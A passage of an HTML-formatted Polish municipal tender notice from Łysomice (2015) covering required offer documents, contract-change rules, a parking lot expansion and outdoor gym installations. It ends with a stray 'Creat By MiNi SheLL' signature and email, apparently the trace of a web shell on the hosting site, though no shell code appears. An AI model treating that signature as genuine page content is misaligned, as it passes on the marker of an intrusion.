<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.	Dokumenty składające się na ofertę:
1)	Dokumenty potwierdzające spełnianie warunków udziału w postępowaniu, wskazane w ogłoszeniu o zamówieniu oraz w pkt. VI niniejszej SIWZ.
2)	Wypełniony Formularz Oferty stanowiący załącznik nr 2 do SIWZ.
3)	Wypełnione kosztorysy ofertowe (odpowiednik załącznika nr 9 do SIWZ z wypełnionymi rubrykami o charakterze cenotwórczym- Cena, R, M,S).
4)	Dowód wniesienia wadium.
5)	Stosowne pełnomocnictwo do reprezentowania wykonawcy w przetargu udzielone dla osoby/osób podpisującej ofertę i wymagane oświadczenia, o ile osoba/osoby składająca i podpisująca ofertę nie jest ujawniona w wypisie z Krajowego Rejestru Sądowego / informacji z CEIDG (proponowany wzór pełnomocnictwa stanowi załącznik nr 5 do SIWZ).
6)	Wszystkie dodatkowe informacje należy przedstawić w dodatkowym (-ych) załączniku (-kach) do Formularza Oferty, o ile nie można ich wskazać w formularzu ofertowym.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.	Postanowienia umowy zawartej w wyniku przeprowadzenia niniejszego postępowania o udzielenie zamówienia publicznego mogą zostać zmienione w przypadku:
1)	zmiany przepisów prawa;
2)	zmiany terminu realizacji umowy wywołanej niekorzystnymi warunkami atmosferycznymi lub przerwami w realizacji robót spowodowanymi przez zamawiającego - niezależnymi od Wykonawcy, zwłoki lub odmowy wydania wymaganych pozwoleń i uzgodnień przez organy administracji budowlanej - niewynikających z działań i zaniechań Wykonawcy,
3)	udokumentowanego opóźnienia Zamawiającego we wprowadzeniu Wykonawcy na miejsce wykonania robót objętych umową,
4)	ograniczenia zakresu robót i zmiany wynagrodzenia o wartość robót wyłączonych,
5)	zaistnienia konieczności wykonania robót dodatkowych, których nie można było przewidzieć na etapie przygotowania postępowania i złożenia oferty, a ich wykonanie jest niezbędne dla prawidłowej realizacji niniejszego zamówienia; 
2.	Zmiana postanowień zawartej umowy może nastąpić wyłącznie za zgodą obu stron wyrażoną w formie pisemnego aneksu pod rygorem nieważności.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.lysomice.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> www.lysomice.pl.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 19.05.2015 godzina 09:00, miejsce: Urząd Gminy Łysomice 87-148 Łysomice ul. Warszawska 8 pokój nr 3 (Biuro Podawcze).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zamawiający informuje, że ubiega się o dofinansowanie przedmiotowego zamówienia ze środków Unii Europejskiej. W połowie maja 2015r. ma zostać podpisana umowa o dofinasowanie przedmiotowego zadania z Samorządem Województwa Kujawsko - Pomorskiego..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 01 <b>NAZWA:</b> Rozbudowa parkingu o dodatkową powierzchnię parkingową wraz z modernizacją nawierzchni przy ul. Warszawskiej 6 i 8 w Łysomicach, na dz. 168/12, 168/14, 168/15, 168/16, 168/28.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część nr 1 - rozbudowa parkingu o dodatkową powierzchnię parkingową wraz z modernizacją nawierzchni przy ul. Warszawskiej 6 i 8 w Łysomicach, na dz. 168/12, 168/14, 168/15, 168/16, 168/28, która obejmuje w szczególności: 
wykonanie nowej nawierzchni jezdni z kostki brukowej betonowej wibroprasowanej, o grubości 8 cm, koloru szarego; 
wykonanie nowej nawierzchni miejsc parkingowych dla samochodów osobowych z kostki brukowej betonowej wibroprasowanej, o grubości 8 cm, kolor; 
ułożenie krawężników betonowych o wymiarach 12/15 x 30 x 100 cm ustawionych na ławie betonowej z oporem;
wykonanie chodników z kostki brukowej betonowej wibroprasowanej, 
o grubości 6 cm, kolor, ująć w obrzeżach betonowych;   
Zestawienie powierzchni: 
jezdnia: 1 463,00 m2, 
parkingi dla samochodów osobowych: 769,50 m2, 
chodniki: 154,0 m2, 
tereny biologicznie aktywne (zieleń wysoka oraz niska) 615,0 m2;
utwardzenie kostką betonową wibroprasowanąnej gr. 8 cm trzech zjazdów wraz z odwodnieniem liniowym na posesję z ul. Wierzbowej, Łysomice;
wykonanie odprowadzenie wody z nawierzchni za pomocą spadków podłużnych i poprzecznych do projektowanej kanalizacji deszczowej. Spadki podłużne mieszczą się w granicach normatywu projektowania, zaś spadki poprzeczne mieszczą się w granicach 1-2 %. Woda opadowa z powierzchni utwardzonych odprowadzana będzie (parkingi, jezdnie, chodniki) poprzez odwodnienie liniowe i wpust, system kanałów, osadnik szlamowy i separator do istniejącego układu deszczowej. Podczyszczenie wód opadowych poprzez osadnik szlamowy o poj. 4700 litrów i separatorze koalesencyjnym o przepływie 23,4 l/s - zgodnie z projektem; 
wykonanie kanalizacji deszczowej z rur PVC -U od O160 do O200 mm łączonych na uszczelkę gumową; 
wykonanie studni kanalizacyjnych - DN 425 z tworzywa, z włazem żeliwnym przejazdowym;
wykonanie przyłącza do wpustu z typową kratką i skrzynką uliczną, połączyć ze studzienką ściekową z rur betonowych o śr. 500 mm wyposażone w osadniki; 
wykonanie odwadniaczy liniowych ACO - 200V  z korytkami z polimerobetonu ułożonych na podbudowie z betonu B15; 
wykonanie wszelkich prób szczelności przewodów; 
wykonanie zasilania kablowego nn dla oświetlenia parkingu;  
wykonanie oświetlenia parkingu za pomocą opraw oświetleniowych z lampami ledowymi 150W;
wykonanie ogrodzenia systemowego z paneli stalowych ocynkowanych- powlekanych typu sportowego o wysokości 1,60 m na cokole prefabrykowanym o wys. 20 cm;  
dostarczenie i zamontowanie dwóch bram przesuwnych; 
dostarczenie i zamontowanie trzech bram rozwiernych;
dostarczenie i zamontowanie pięciu furtek; 
wykonanie zieleni wysokiej oraz niskiej; 
dostarczenie i zamontowanie dwóch osłon śmietnikowych zgodnie z projektem.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.22.33.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 22.06.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Termin realizacji zamówienia - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 02 <b>NAZWA:</b> Dostawa siłowni zewnętrznych oraz stojaków rowerowych w wybranych miejscowościach gminy Łysomice wraz z montażem oraz wykonaniem prac towarzyszących.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część nr 2 - dostawa siłowni zewnętrznych oraz stojaków rowerowych 
w wybranych miejscowościach gminy Łysomice wraz z montażem oraz wykonaniem prac towarzyszących, a w szczególności: 
dostarczenie i zamontowanie urządzeń siłowni zewnętrznych oraz stojaków rowerowych ze stali nierdzewnej - zgodnie z projektem i kosztorysem,
lokalizacja i bilans urządzeń siłowni zewnętrznych i stojaków rowerowych, (zgodnie z projektem i kosztorysem) t.j.: 
Zakrzewko, urządzenie (zestaw) - 1 szt. oraz stojak na rower - 1 szt.; 
Tylice, urządzenie (zestaw) - 1 szt. oraz stojak na rower - 1 szt.;
Papowo Toruńskie, urządzenie (zestaw) - 2 szt. oraz stojak na rower - 2 szt.;
Ostaszewo, urządzenie (zestaw) - 2 szt. oraz stojak na rower - 2 szt.;
Łysomice, urządzenie (zestaw) - 1 szt. oraz stojak na rower - 2 szt.;
Turzno, urządzenie (zestaw) - 2 szt. oraz stojak na rower - 2 szt.;
Gostkowo, urządzenie (zestaw) - 1 szt. oraz stojak na rower - 1 szt.;
Kamionki Małe, urządzenie (zestaw) - 1 szt. oraz stojak na rower - 1 szt.;
Kamionki Duże, urządzenie (zestaw) - 1 szt. oraz stojak na rower - 1 szt.;
Lulkowo, urządzenie (zestaw) - 1 szt. oraz stojak na rower - 1 szt.;
Wytrębowice, urządzenie (zestaw) - 1 szt. oraz stojak na rower - 1 szt.;
Kowróz, urządzenie (zestaw) - 1 szt. oraz stojak na rower - 1 szt.;
Świerczynki, urządzenie (zestaw) - 1 szt. oraz stojak na rower - 1 szt.;
Różankowo, urządzenie (zestaw) - 1 szt. oraz stojak na rower - 1 szt.;
Piwnice, urządzenie (zestaw) - 1 szt. oraz stojak na rower - 1 szt.
utwardzenie kostką betonową wibroprasowaną o gr. 6 cm. terenu pod i wokół urządzeń siłowni zewnętrznych i stojaków na rowery, w zakresie zgodnym z projektem..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 37.41.00.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 22.06.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 96</li>
<li>2. Okres rękojmi i gwarancji na urządzenia wbudowane / zamontowane przez Wykonawcę - 4</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com